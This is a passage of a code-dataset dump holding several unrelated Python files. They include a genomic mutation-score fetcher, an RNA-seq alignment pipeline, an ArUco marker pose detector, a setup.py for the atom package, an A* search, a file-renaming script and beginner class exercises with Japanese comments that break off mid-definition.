command\n\n\n# print(check_shell(\"date\"))\n","repo_name":"ExpectoX1/server_automate","sub_path":"backend/functions/shell_check.py","file_name":"shell_check.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16172037100","text":"#!/usr/bin/env python\n\nimport os\nimport logging\nfrom datetime import datetime as dt\n\nfrom bgcore import tsv\nfrom fannsdb.mutations.mutation import Mutation\nfrom fannsdb.mutations.parser import DnaAndProtMutationParser, PrematureEnd, UnexpectedToken\nfrom fannsdb.columns import COORD_COLUMNS\nfrom fannsdb.utils import RatedProgress\n\nSTATE_LINE_NUM = \"line_num\"\nSTATE_LINE = \"line\"\nSTATE_MUTATION = \"mutation\"\nSTATE_HITS = \"hits\"\nSTATE_FAILS = \"fails\"\n\ndef fetch_iter(db, muts_path, maps=None, predictors=None, muts_header=False, state=None, logger=None):\n\t\"\"\"\n\tIterator that fetches scores from the database from the mutations in a file.\n\t\n\t:param db: FannsDb interface.\n\t:param muts_path: The input path for mutations.\n\t:param maps: Map transcript/protein ensembl identifiers with external identifiers (swissprot_id, ...)\n\t:param predictors: Predictors for which to obtain the scores.\n\t:param muts_header: Whether the muts_path has a header or not.\n\t:param state: The state of the iteration: hits, fails.\n\t:param logger: Logger to use. 
If not specified a new one is created.\n\t\"\"\"\n\n\tdef query_mutation(logger, db, mut, maps, predictors):\n\n\t\tif mut.coord == Mutation.GENOMIC:\n\t\t\tif logger.isEnabledFor(logging.DEBUG):\n\t\t\t\tlogger.debug(\" Querying {} {} {} {} {} {} {} ...\".format(\n\t\t\t\t\tmut.chr, mut.start, mut.end or \"*\", mut.ref or \"*\", mut.alt, mut.strand or \"*\", mut.identifier or \"*\"))\n\n\t\t\tfor row in db.query_scores(chr=mut.chr, start=mut.start,\n\t\t\t\t\t\t\t\t\t\t\tref=mut.ref, alt=mut.alt, strand=mut.strand,\n\t\t\t\t\t\t\t\t\t\t\tpredictors=predictors, maps=maps):\n\t\t\t\tyield row\n\n\t\telif mut.coord == Mutation.PROTEIN:\n\t\t\tif logger.isEnabledFor(logging.DEBUG):\n\t\t\t\tlogger.debug(\" Querying {} {} {} {} {} ...\".format(\n\t\t\t\t\tmut.protein, mut.start, mut.ref or \"*\", mut.alt, mut.identifier or \"*\"))\n\n\t\t\tfor row in db.query_scores(protein=mut.protein, aa_pos=mut.start, aa_ref=mut.ref, aa_alt=mut.alt,\n\t\t\t\t\t\t\t\t\t\t\tpredictors=predictors, maps=maps):\n\t\t\t\tyield row\n\n\t\telse:\n\t\t\tlogger.warning(\"Unknown coordinates system: {}\".format(mut.line))\n\n\tif logger is None:\n\t\tlogger = logging.getLogger(\"fannsdb.fetch\")\n\n\tstate = state if state is not None else {}\n\tstate[STATE_HITS] = state[STATE_FAILS] = 0\n\tmaps = maps if maps is not None else []\n\tpredictors = predictors if predictors is not None else []\n\t\n\tlogger.info(\"Reading {} ...\".format(os.path.basename(muts_path) if muts_path != \"-\" else \"from standard input\"))\n\n\tprogress = RatedProgress(logger, name=\"SNVs\")\n\n\twith tsv.open(muts_path) as f:\n\t\tif muts_header:\n\t\t\ttsv.skip_comments_and_empty(f) # this returns the first non-empty, non-comment line (the header)\n\n\t\tmutparser = DnaAndProtMutationParser()\n\t\tfor line_num, line in enumerate(f, start=1):\n\t\t\tline = line.rstrip(\" \\n\\r\")\n\t\t\tif len(line) == 0 or line.startswith(\"#\"):\n\t\t\t\tcontinue\n\n\t\t\ttry:\n\t\t\t\tmut = mutparser.parse(line)\n\t\t\texcept PrematureEnd:\n\t\t\t\tlogger.error(\"Missing fields at line {}\".format(line_num))\n\t\t\t\tstate[STATE_FAILS] += 1\n\t\t\t\tcontinue\n\t\t\texcept UnexpectedToken as ex:\n\t\t\t\tlogger.error(\"Unexpected field '{}' at line {}\".format(ex.args[0], line_num))\n\t\t\t\tstate[STATE_FAILS] += 1\n\t\t\t\tcontinue\n\n\t\t\tstate.update({\n\t\t\t\tSTATE_LINE_NUM : line_num,\n\t\t\t\tSTATE_LINE : line,\n\t\t\t\tSTATE_MUTATION : mut})\n\n\t\t\texists = False\n\t\t\tfor row in query_mutation(logger, db, mut, maps, predictors):\n\t\t\t\texists = True\n\n\t\t\t\tyield row\n\n\t\t\tprogress.update()\n\n\t\t\tif exists:\n\t\t\t\tstate[STATE_HITS] += 1\n\t\t\telse:\n\t\t\t\tstate[STATE_FAILS] += 1\n\n\tprogress.log_totals()\n\n\thits, fails = [state[k] for k in [STATE_HITS, STATE_FAILS]]\n\tlogger.info(\"Finished. 
total={}, hits={}, fails={}, elapsed={}\".format(hits + fails, hits, fails, progress.elapsed_time))\n\n\ndef fetch(db, muts_path, out_path, params=None, columns=None, maps=None, predictors=None,\n\t\t labels=None, calc_labels=None, muts_header=False, logger=None):\n\t\n\tparams = params or {}\n\tcolumns = columns or [c.lower() for c in COORD_COLUMNS]\n\tmaps = maps or []\n\tpredictors = predictors or []\n\tlabels = labels or []\n\t\n\tstate = {}\n\t\n\twith tsv.open(out_path, \"w\") as wf:\n\t\t\n\t\tmetadata = db.metadata\n\t\tif \"version\" in metadata:\n\t\t\ttsv.write_param(wf, \"db-version\", db.metadata[\"version\"])\n\t\ttsv.write_param(wf, \"fetched\", dt.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n\t\tfor k, v in params.items():\n\t\t\ttsv.write_param(wf, k, v)\n\t\n\t\ttsv.write_line(wf, \"ID\", *[c.upper() for c in columns] + [m.upper() for m in maps] + predictors + labels)\n\t\n\t\tfor row in fetch_iter(db, muts_path, maps=maps, predictors=predictors,\n\t\t\t\t\t\t\t muts_header=muts_header, state=state, logger=logger):\n\t\t\t\n\t\t\t# keep per-row labels in a separate name so the label column list is not overwritten\n\t\t\tif calc_labels is not None:\n\t\t\t\trow_labels = calc_labels(row) or {}\n\t\t\telse:\n\t\t\t\trow_labels = {}\n\t\n\t\t\txrefs = row[\"xrefs\"]\n\t\t\tscores = row[\"scores\"]\n\n\t\t\ttsv.write_line(wf, state[STATE_MUTATION].identifier,\n\t\t\t\t *[row[c] for c in columns]\n\t\t\t\t + [xrefs[m] for m in maps]\n\t\t\t\t + [scores[p] for p in predictors]\n\t\t\t\t + [row_labels.get(l, \"\") for l in labels])\n\t\n\treturn {k : state[k] for k in [STATE_HITS, STATE_FAILS]}","repo_name":"chris-zen/phd-thesis","sub_path":"chapter3/fannsdb/fannsdb/ops/fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":4903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"12430559281","text":"#!/usr/bin/env python3\nimport sys\nsys.path.append('/cephfs/users/mbrown/PIPELINES/RNAseq/')\nimport os\nimport re\nfrom utility.date_time import date_time\nimport subprocess\nimport json\nfrom utility.log import log\nfrom alignment.cutadapter import cutadapter\nfrom alignment.fastqc import fastqc\nfrom alignment.bwt2_pe import bwt2_pe\nfrom alignment.novosort_sort_pe import novosort_sort_pe\nfrom alignment.picard_insert_size import picard_insert_size\nfrom alignment.qc_bam import qc_bam\nfrom alignment.filter_wrap import filter_wrap\nfrom alignment.star import star\nfrom subprocess import call\nfrom alignment.parse_qc import parse_qc\nfrom utility.set_acls import set_acls\n\n\nclass Pipeline:\n    def __init__(self, end1, end2, json_config):\n        self.json_config = json_config\n        self.sf1 = end1\n        self.sf2 = end2\n        self.end1 = os.path.basename(self.sf1)\n        self.end2 = os.path.basename(self.sf2)\n        self.status = 0\n        self.config_data = json.loads(open(self.json_config, 'r').read())\n        s = re.match('^(\\\\S+)_1_sequence\\\\.txt\\\\.gz$', self.end1)\n        if s:\n            self.sample = s.group(1)\n        else:\n            s = re.match('(^\\\\S+)_\\\\D*\\\\d\\\\.f\\\\w*q\\\\.gz$', self.end1)\n            self.sample = s.group(1)\n\n        HGACID = self.sample.split(\"_\")\n        self.bnid = HGACID[0]\n        self.fastqc_tool = self.config_data['tools']['fastqc']\n        self.java_tool = self.config_data['tools']['java']\n        self.picard_tool = self.config_data['tools']['picard']\n        self.novosort = self.config_data['tools']['novosort']\n        self.bwt2_tool = self.config_data['tools']['bwt2']\n        self.bwt2_ref = self.config_data['refs']['bwt2']\n        self.samtools_tool = self.config_data['tools']['samtools']\n        self.picard_tmp = 'picard_tmp'\n        self.star_tool = self.config_data['tools']['star']\n        self.pdxflag = 
self.config_data['params']['pdxflag']\n self.skip_cut = self.config_data['params']['skip_cut']\n if self.pdxflag == 'Y':\n self.mmu_filter = self.config_data['tools']['mouse_filter']\n self.mmu_star_ref = self.config_data['refs']['mmu_star']\n self.hsa_star_ref = self.config_data['refs']['hsa_star']\n self.genome_ref = self.config_data['refs']['genome']\n self.samtools_ref = self.config_data['refs']['samtools']\n self.gtf_ref = self.config_data['refs']['gtf']\n self.tx = self.config_data['refs']['transcriptome']\n self.align_dir = self.config_data['refs']['align_dir']\n self.project = self.config_data['refs']['project']\n self.project_dir = self.config_data['refs']['project_dir']\n self.cwd = self.project_dir + self.project + '/' + self.align_dir + '/' + self.bnid + '/' + self.sample\n self.user = self.config_data['params']['user']\n self.group = self.config_data['params']['group']\n self.threads = self.config_data['params']['threads']\n self.ram = self.config_data['params']['ram']\n self.sf = self.config_data['params']['stranded']\n self.bam_dir = 'BAMS/'\n self.qc_dir = 'QC/'\n self.log_dir = 'LOGS/'\n self.star_dir = 'STAR_OUT/'\n self.fq_trimmed = 'TRIMMED_FQ/'\n self.loc = self.log_dir + self.sample + '.pipe.log'\n self.pipeline()\n\n def pipeline(self):\n # temp line to source environment variables until compute is restarted\n src_env = '. /etc/environment'\n call(src_env, shell=True)\n\n # create working directory\n if not os.path.isdir(self.cwd):\n mk_cwd = 'mkdir -p ' + self.cwd\n sys.stderr.write(date_time() + 'Creating working directory ' + mk_cwd + '\\n')\n call(mk_cwd, shell=True)\n os.chdir(self.cwd)\n if not os.path.isdir(self.log_dir):\n mk_log_dir = 'mkdir ' + self.log_dir\n call(mk_log_dir, shell=True)\n log(self.loc, date_time() + 'Made log directory ' + self.log_dir + \"\\n\")\n if not os.path.isdir(self.fq_trimmed):\n mk_fq_dir = 'mkdir ' + self.fq_trimmed\n call(mk_fq_dir, shell=True)\n log(self.loc, date_time() + 'Made fastq trimmed directory ' + self.fq_trimmed + \"\\n\")\n os.chdir(self.fq_trimmed)\n mv_fq = 'mv ../' + self.log_dir + ' .'\n call(mv_fq, shell=True)\n log(self.loc, date_time() + 'Changed into ' + self.fq_trimmed + \" and moved log directory there\\n\")\n if not os.path.isdir(self.star_dir):\n mk_star_dir = 'mkdir ' + self.star_dir\n call(mk_star_dir, shell=True)\n log(self.loc, date_time() + 'Made star output directory ' + self.star_dir + \"\\n\")\n if not os.path.isdir(self.bam_dir):\n mk_bam_dir = 'mkdir ' + self.bam_dir\n call(mk_bam_dir, shell=True)\n log(self.loc, date_time() + 'Made bam output directory ' + self.bam_dir + \"\\n\")\n if not os.path.isdir(self.qc_dir):\n mk_qc_dir = 'mkdir ' + self.qc_dir\n call(mk_qc_dir, shell=True)\n log(self.loc, date_time() + 'Made qc directory ' + self.qc_dir + \"\\n\")\n log(self.loc,\n date_time() + \"Starting alignment qc for paired end sample files \" + self.end1 + \" and \" + self.end2 + \"\\n\")\n\n # remove adapters\n if self.skip_cut == 'N':\n check = cutadapter(self.sample, self.sf1, self.sf2, self.json_config)\n if check != 0:\n log(self.loc, date_time() + 'cutadapt failure for ' + self.sample + '\\n')\n exit(1)\n\n # start fastqc, will run while insert size being calculated\n\n end_ss1 = self.sample + '_1.subset.fastq'\n end_ss2 = self.sample + '_2.subset.fastq'\n subset = self.sample + '_subset'\n\n ss_cmd = 'gunzip -c ' + self.end1 + ' | head -n 4000000 > ' + end_ss1\n subprocess.call(ss_cmd, shell=True)\n ss_cmd = 'gunzip -c ' + self.end2 + ' | head -n 4000000 > ' + end_ss2\n 
subprocess.call(ss_cmd, shell=True)\n # check certain key processes\n\n check = bwt2_pe(self.bwt2_tool, self.tx, end_ss1, end_ss2, self.samtools_tool, self.samtools_ref, subset,\n self.threads, self.log_dir)\n if check != 0:\n log(self.loc, date_time() + 'Bowtie2 failure for ' + self.sample + '\\n')\n self.status = 1\n exit(1)\n check = novosort_sort_pe(self.novosort, subset, self.log_dir, self.threads,\n self.ram, 'coord') # rest won't run until completed\n if check != 0:\n log(self.loc, date_time() + 'novosort sort failure for ' + self.sample + '\\n')\n self.status = 1\n exit(1)\n (x, s) = picard_insert_size(self.java_tool, self.picard_tool, subset, self.log_dir)\n log(self.loc, date_time() + 'Running qc on fastq file\\n')\n fastqc(self.fastqc_tool, self.sample, self.end1, self.end2, self.threads)\n if self.pdxflag == 'Y':\n log(self.loc, date_time() + 'Aligning and filtering reads for mouse contamination')\n check = filter_wrap(self.mmu_filter, self.star_tool, self.mmu_star_ref, self.end1, self.end2,\n self.sample, self.log_dir, self.threads, self.novosort, self.ram)\n if check != 0:\n log(self.loc, date_time() + 'Read filter failure for ' + self.sample + '\\n')\n exit(1)\n log(self.loc, date_time() + 'Performing star alignment ' + self.sample + '\\n')\n check = star(self.star_tool, self.hsa_star_ref, self.end1, self.end2, self.sample, self.log_dir,\n self.threads, self.sf)\n else:\n log(self.loc, date_time() + 'Starting star align\\n')\n check = star(self.star_tool, self.genome_ref, self.end1, self.end2, self.sample, self.log_dir, self.threads,\n self.sf)\n\n if check != 0:\n log(self.loc, date_time() + 'star alignment failure for ' + self.sample + '\\n')\n self.status = 1\n exit(1)\n # run QC on bams\n log(self.loc, date_time() + 'Running bam QC on ' + self.sample + '\\n')\n check = qc_bam(self.sample, self.json_config)\n if check != 0:\n log(self.loc, date_time() + 'bam qc process failure for ' + self.sample + '\\n')\n self.status = 1\n exit(1)\n log(self.loc, date_time() + 'Creating QC summary\\n')\n check = parse_qc(self.json_config, self.sample)\n if check != 0:\n log(self.loc, date_time() + 'qc summary failure for ' + self.sample + '\\n')\n self.status = 1\n exit(1)\n # move outputs to correct directories\n log(self.loc, date_time() + 'Organizing outputs\\n')\n mv_bams = 'mv *Aligned*.bam ' + self.bam_dir\n call(mv_bams, shell=True)\n mv_star = 'mv *.tab ' + self.star_dir\n call(mv_star, shell=True)\n if self.pdxflag == 'Y':\n mv_filt_log = 'mv *.runlog.txt ' + self.qc_dir\n call(mv_filt_log, shell=True)\n mv_sub = 'mv *subset.insert* *.txt *.pdf *.json ' + self.qc_dir + '; cp ' + self.json_config + ' ' + self.qc_dir\n call(mv_sub, shell=True)\n # set acls and mv subdirectories to right place\n set_acls('./', self.user, self.group)\n mv_dir = 'mv ' + ' '.join((self.bam_dir, self.log_dir, self.qc_dir, self.star_dir)) + ' ../'\n call(mv_dir, shell=True)\n rm_tmp = 'rm -rf *STAR* *subset*'\n call(rm_tmp, shell=True)\n\n os.chdir('../../')\n sys.stderr.write(date_time() + 'Moving subdirs out of ' + self.sample + '\\n')\n mv_dirs = 'mv ' + self.sample + '/* .'\n call(mv_dirs, shell=True)\n rm_lane = 'rmdir ' + self.sample\n call(rm_lane, shell=True)\n\n sys.stderr.write(date_time() + 'Pipeline complete for ' + self.sample + '\\n')\n self.status = 0\n\n\ndef main():\n import argparse\n parser = argparse.ArgumentParser(description='RNA alignment paired-end QC pipeline')\n parser.add_argument('-f1', '--file1', action='store', dest='end1', help='First fastq file')\n 
parser.add_argument('-f2', '--file2', action='store', dest='end2', help='Second fastq file')\n parser.add_argument('-j', '--json', action='store', dest='config_file',\n help='JSON config file containing tool and reference locations')\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n inputs = parser.parse_args()\n\n end1 = inputs.end1\n end2 = inputs.end2\n config_file = inputs.config_file\n Pipeline(end1, end2, config_file)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"WhiteLab/RNAseq","sub_path":"alignment/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":10713,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"}
{"seq_id":"74110209524","text":"import numpy as np\r\nimport cv2\r\nimport cv2.aruco as aruco\r\n\r\n\r\n# ***\r\n# Load camera parameters (prior calibration needed) and use them to estimate pose of found ArUco markers\r\n# This is happening live on the computer's camera (with correct camera name and camera source it would work for any calibrated\r\n# camera)\r\n# \r\n# press q to quit\r\n# \r\n# ***\r\n\r\n\r\n\r\n# Load camera parameters:\r\ncameraName = 'EriksLaptopCam'\r\nfolderName = 'CameraCalibration/'\r\ncamParamsName = folderName + cameraName + '.npz'\r\ncamParams = np.load(camParamsName) \r\n\r\nretVal = camParams['retVal']\r\ncameraMatrix = camParams['cameraMatrix']\r\ndistCoeffs = camParams['distCoeffs'] \r\nrvecsCalib = camParams['rvecs']\r\ntvecsCalib = camParams['tvecs']\r\n# print(retVal, cameraMatrix, distCoeffs, rvecsCalib, tvecsCalib)\r\nprint('Camera parameters loaded.')\r\n\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\nwhile(True):\r\n # Capture frame-by-frame\r\n ret, frame = cap.read()\r\n #print(frame.shape) #480x640\r\n # Our operations on the frame come here\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n aruco_dict = aruco.Dictionary_get(aruco.DICT_6X6_250)\r\n parameters = aruco.DetectorParameters_create()\r\n\r\n #print(parameters)\r\n\r\n ''' detectMarkers(...)\r\n detectMarkers(image, dictionary[, corners[, ids[, parameters[, rejectedI\r\n mgPoints]]]]) -> corners, ids, rejectedImgPoints\r\n '''\r\n #lists of ids and the corners belonging to each id\r\n corners, ids, rejectedImgPoints = aruco.detectMarkers(gray, aruco_dict, parameters=parameters)\r\n # print(corners)\r\n print(f'ArUco markers found: {len(corners)}')\r\n\r\n #It's working.\r\n # my problem was that the cellphone put black all around it. 
The algorithm\r\n # depends very much upon finding rectangular black blobs\r\n\r\n # gray = aruco.drawDetectedMarkers(gray, corners, ids, (0,255,0))\r\n frame = aruco.drawDetectedMarkers(frame, corners, ids, (0,255,0))\r\n\r\n\r\n \r\n rvecs, tvecs, objPoints= aruco.estimatePoseSingleMarkers(corners, 70, cameraMatrix, distCoeffs)\r\n\r\n for i in range(len(corners)):\r\n rvec = rvecs[i]\r\n tvec = tvecs[i] \r\n frame = aruco.drawAxis(frame, cameraMatrix, distCoeffs, rvec, tvec, 35)\r\n \r\n\r\n\r\n #print(rejectedImgPoints)\r\n # Display the resulting frame\r\n cv2.imshow('frame', frame)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n# When everything done, release the capture\r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"plerik/RV-cameraLocalization","sub_path":"ArucoMarkers/code_Pose_DetectionCamera.py","file_name":"code_Pose_DetectionCamera.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"}
{"seq_id":"18880178530","text":"import os\nimport sys\nfrom setuptools import setup, find_packages, Extension\nfrom setuptools.command.build_ext import build_ext\n\nsys.path.insert(0, os.path.abspath('.'))\nfrom atom.version import __version__\n\n# Use the env var ATOM_DISABLE_FH4 to disable linking against VCRUNTIME140_1.dll\n\next_modules = [\n Extension(\n 'atom.catom',\n [\n 'atom/src/atomlist.cpp',\n 'atom/src/atomdict.cpp',\n 'atom/src/atomset.cpp',\n 'atom/src/atomref.cpp',\n 'atom/src/catom.cpp',\n 'atom/src/catommodule.cpp',\n 'atom/src/defaultvaluebehavior.cpp',\n 'atom/src/delattrbehavior.cpp',\n 'atom/src/enumtypes.cpp',\n 'atom/src/eventbinder.cpp',\n 'atom/src/getattrbehavior.cpp',\n 'atom/src/member.cpp',\n 'atom/src/memberchange.cpp',\n 'atom/src/methodwrapper.cpp',\n 'atom/src/observerpool.cpp',\n 'atom/src/postgetattrbehavior.cpp',\n 'atom/src/postsetattrbehavior.cpp',\n 'atom/src/postvalidatebehavior.cpp',\n 'atom/src/propertyhelper.cpp',\n 'atom/src/setattrbehavior.cpp',\n 'atom/src/signalconnector.cpp',\n 'atom/src/validatebehavior.cpp',\n ],\n include_dirs=['src'],\n language='c++',\n ),\n Extension(\n 'atom.datastructures.sortedmap',\n ['atom/src/sortedmap.cpp'],\n include_dirs=['src'],\n language='c++',\n ),\n]\n\n\nclass BuildExt(build_ext):\n \"\"\" A custom build extension for adding compiler-specific options.\n\n \"\"\"\n c_opts = {\n 'msvc': ['/EHsc'],\n }\n\n def initialize_options(self):\n build_ext.initialize_options(self)\n self.debug = False\n\n def build_extensions(self):\n\n # Delayed import of cppy to let setup_requires install it if necessary\n import cppy\n\n ct = self.compiler.compiler_type\n opts = self.c_opts.get(ct, [])\n for ext in self.extensions:\n ext.include_dirs.insert(0, cppy.get_include())\n ext.extra_compile_args = opts\n if sys.platform == 'darwin':\n ext.extra_compile_args += ['-stdlib=libc++']\n ext.extra_link_args += ['-stdlib=libc++']\n if (ct == 'msvc' and os.environ.get('ATOM_DISABLE_FH4')):\n # Disable FH4 Exception Handling implementation so that we don't\n # require VCRUNTIME140_1.dll. 
For more details, see:\n # https://devblogs.microsoft.com/cppblog/making-cpp-exception-handling-smaller-x64/\n # https://github.com/joerick/cibuildwheel/issues/423#issuecomment-677763904\n ext.extra_compile_args.append('/d2FH4-')\n build_ext.build_extensions(self)\n\n\nsetup(\n name='atom',\n version=__version__,\n author='The Nucleic Development Team',\n author_email='sccolbert@gmail.com',\n url='https://github.com/nucleic/atom',\n description='Memory efficient Python objects',\n long_description=open('README.rst').read(),\n license='BSD',\n classifiers=[\n # https://pypi.org/pypi?%3Aaction=list_classifiers\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.9',\n 'Programming Language :: Python :: Implementation :: CPython',\n ],\n python_requires='>=3.6',\n setup_requires=['cppy>=1.1.0'],\n packages=find_packages(exclude=['tests', 'tests.*']),\n ext_modules=ext_modules,\n cmdclass={'build_ext': BuildExt},\n)\n","repo_name":"PierreAndre24/atom","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"}
{"seq_id":"12287774081","text":"from pqueue import PriorityQueue\n\nclass Graph:\n \"\"\"\n Abstract graph.\n Inherit from this class and implement its methods to have a working Graph\n \"\"\"\n def getChildren(self, position):\n pass\n\n def getHCost(self, position, goal):\n '''\n Heuristic value of a certain node. For a dijkstra implementation, always return 0\n '''\n return 0\n\nclass Node:\n def __init__(self, position, cost=0, parent=None):\n # State representation. It can be a tuple, an integer, \n # or any data structure that holds your current state for this node\n self.position = position\n self.cost = cost\n self.parent = parent\n\ndef astar(graph, start, goal):\n # Fringe. Nodes not visited yet\n openList = PriorityQueue()\n\n # Visited Nodes. Each one will store its parent position\n closedList = {}\n\n node = Node(start)\n openList.push(node)\n\n while openList:\n node, _ = openList.pop()\n position, cost = node.position, node.cost\n\n if position in closedList:\n # Oops. Already expanded.\n continue\n\n # Save the node in the closed list, and keep track of its parent\n closedList[position] = node.parent\n if position == goal:\n break\n for childPosition, actionCost in graph.getChildren(position):\n # Only add to the open list if it's not expanded yet\n if childPosition not in closedList:\n childNode = Node(childPosition, cost + actionCost, position)\n openList.push(childNode, childNode.cost + graph.getHCost(childPosition, goal))\n\n path = []\n if position == goal:\n # Ensure a path has been found\n path.insert(0, position)\n while position and position != start:\n position = closedList[position]\n path.insert(0, position)\n\n return path\n","repo_name":"neo4u/neophyte","sub_path":"graphs/concepts/astar.py","file_name":"astar.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"}
{"seq_id":"37515487092","text":"import pdb\nimport os, sys\n\ndef rename_fit_files(expDir, orig_date, new_date, dryRun=1):\n ''' Simple func. 
to fix mistake in fitList -- make the date 220206 instead of 210206\n '''\n curr_loc = os.getcwd() + '/';\n full_path = curr_loc + expDir + 'structures/';\n files = os.listdir(full_path);\n for f in files:\n if f.find(orig_date) >= 0:\n old_name = f;\n new_name = f.replace(orig_date, new_date);\n print('renaming %s to %s' % (old_name, new_name));\n if dryRun == 0:\n os.rename(full_path + old_name, full_path + new_name);\n \n\ndef rename_files(loc_data, files, fileExt='.xml', mBase='m6', trialRun=1, isDataList=False):\n # used for renaming files within a directory to pad numbers up to 2 digits\n # - i.e. m675p4r9 to m675p04r09\n # can also be used to rename files in a dataList if fileExt='' and files is the list of names in the dataList\n # trialRun: if True, just print what would be the renaming, but don't do it\n # if False, then actually rename\n\n for ind, i in enumerate(files):\n# if i.find('#') >= 0:\n# os.rename(loc_data + i, loc_data + i.replace('#', ''))\n# print('IGNORE: renaming %s to %s' % (loc_data + i, loc_data + i.replace('#', '')))\n\n if i.find(mBase) >=0 and i.find(fileExt) >= 0: # .mat; or change to .xml/.exxd if changing names in /recordings\n\n ########\n # first, figure out where the meaningful part of the program name ends\n ########\n if isDataList: # why treat separately? well, some dataList entries have m###pN_blahblah, others are m#pN#Z\n endInd = i.find('_');\n if endInd == -1: # i.e.\n endInd = i.find('#') # if there isn't '_', then find '#'\n if endInd == -1:\n endInd = len(i); # then, just get the end\n else:\n if 'structures' in loc_data:\n endInd = i.find('_') # if changing in /structures/\n elif 'recordings' in loc_data:\n endInd = i.find('#') # if changing in /recordings/;\n else:\n print('uhoh...are you sure you are renaming the right directory?');\n endInd = 0;\n\n\n ## updating unit number ([r/l]##)\n try:\n r_ind = i.find('r'); # if updating r (unit number)\n if r_ind < 0 or r_ind > endInd: # i.e. then there is an R in the program name...\n r_ind = i.find('l')\n substr_to_replace = i[r_ind+1:endInd]\n #print('substr: %s' % substr_to_replace)\n new_str = i[0:r_ind+1] + '%02d' % int(substr_to_replace) + i[endInd:]\n except:\n new_str = i;\n\n ## updating penetration number (p##)\n try:\n p_ind = new_str.find('p'); # if updating p (penetration number)\n pEnd_ind = new_str.find('r') # if changing in /recordings/; will be \"r\" or \"l\"\n if pEnd_ind > endInd or pEnd_ind < 0: # i.e. the \"r\" is in the program name! or not here at all\n pEnd_ind = new_str.find('l');\n substr_to_replace = new_str[p_ind+1:pEnd_ind]\n #print('substr: %s' % substr_to_replace)\n new_str2 = new_str[0:p_ind+1] + '%02d' % int(substr_to_replace) + new_str[pEnd_ind:]\n except:\n new_str2 = new_str;\n\n ## finally, the part that applies to both!\n if new_str2 == i:\n continue;\n \n if trialRun == 1:\n print('renaming %s to %s' % (i, new_str2))\n else:\n os.rename(loc_data + i, loc_data + new_str2)\n\n files[ind] = new_str2;\n\n return files;\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) < 2:\n print('Need one argument, at least! 
Folder to look into');\n \n loc_data = sys.argv[1];\n try:\n fileExt = sys.argv[2];\n except:\n fileExt = '.xml';\n try:\n mBase = sys.argv[3];\n except:\n mBase = 'm6';\n try:\n trRun = int(sys.argv[4]);\n except:\n trRun = 1;\n\n files = os.listdir(loc_data);\n\n rename_files(loc_data, files, fileExt, mBase, trRun);\n","repo_name":"paul-levy/SF_diversity","sub_path":"rename_files.py","file_name":"rename_files.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"20820362553","text":"import clr\nclr.AddReference('RevitAPI')\nfrom Autodesk.Revit.DB import *\n\ndef IsTopoSubregion(topo):\n\tif hasattr(topo, \"IsSiteSubRegion\"): return topo.IsSiteSubRegion\n\telse: return False\n\ntopos = UnwrapElement(IN[0])\n\nif isinstance(IN[0], list): OUT = [IsTopoSubregion(x) for x in topos]\nelse: OUT = IsTopoSubregion(topos)","repo_name":"andydandy74/ClockworkForDynamo","sub_path":"nodes/2.x/python/Topography.IsSubregion.py","file_name":"Topography.IsSubregion.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":207,"dataset":"github-code","pt":"76"}
{"seq_id":"32672841423","text":"import math\r\n\r\n#1\r\n#Think of four attributes that come to mind when you hear 'apple'.\r\n#Define an Apple class that holds those four attributes as instance variables\r\nprint(\"--challenge 1--\")\r\n\r\nclass Apple:\r\n def __init__(self, color, size, weight, sweet):\r\n self.color = color\r\n self.size = size\r\n self.weight = weight\r\n self.sweet = sweet\r\n\r\n#2\r\n#Define a Circle class that represents a circle.\r\n#Give the class an area method that computes and returns its area.\r\n#You can use the pi constant from Python's built-in math module for the calculation.\r\n#Then create a Circle object, call its area method, and print the result.\r\nprint(\"--challenge 2--\")\r\n\r\nclass Circle:\r\n def __init__(self, r):\r\n self.radius = r\r\n\r\n def area(self):\r\n return self.radius * self.radius * math.pi\r\n\r\nmyCircle = Circle(10)\r\nprint(myCircle.area())\r\n\r\n#3\r\n#Define a Triangle class that represents a triangle, with an area method that returns its area.\r\n#Then create a Triangle object, call its area method, and print the result.\r\nprint(\"--challenge 3--\")\r\n\r\nclass Triangle:\r\n def __init__(self, b, h):\r\n self.bottom = b\r\n self.height = h\r\n\r\n def area(self):\r\n return self.bottom * self.height / 2\r\n\r\nmyTriangle = Triangle(5, 8)\r\nprint(myTriangle.area())\r\n\r\n#4\r\n#Define a Hexagon class that represents a hexagon.\r\n#Give the class a calculate_perimeter method that computes and returns the perimeter.\r\n#Then create a Hexagon object, call its calculate_perimeter method, and print the result.\r\nprint(\"--challenge 4--\")\r\n\r\nclass Hexagon():\r\n def __init__(self, s1, s2, s3, s4, s5, s6):\r\n self.s1 = s1\r\n self.s2 = s2\r\n self.s3 = s3\r\n self.s4 = s4\r\n self.s5 = s5\r\n self.s6 = s6\r\n\r\n def 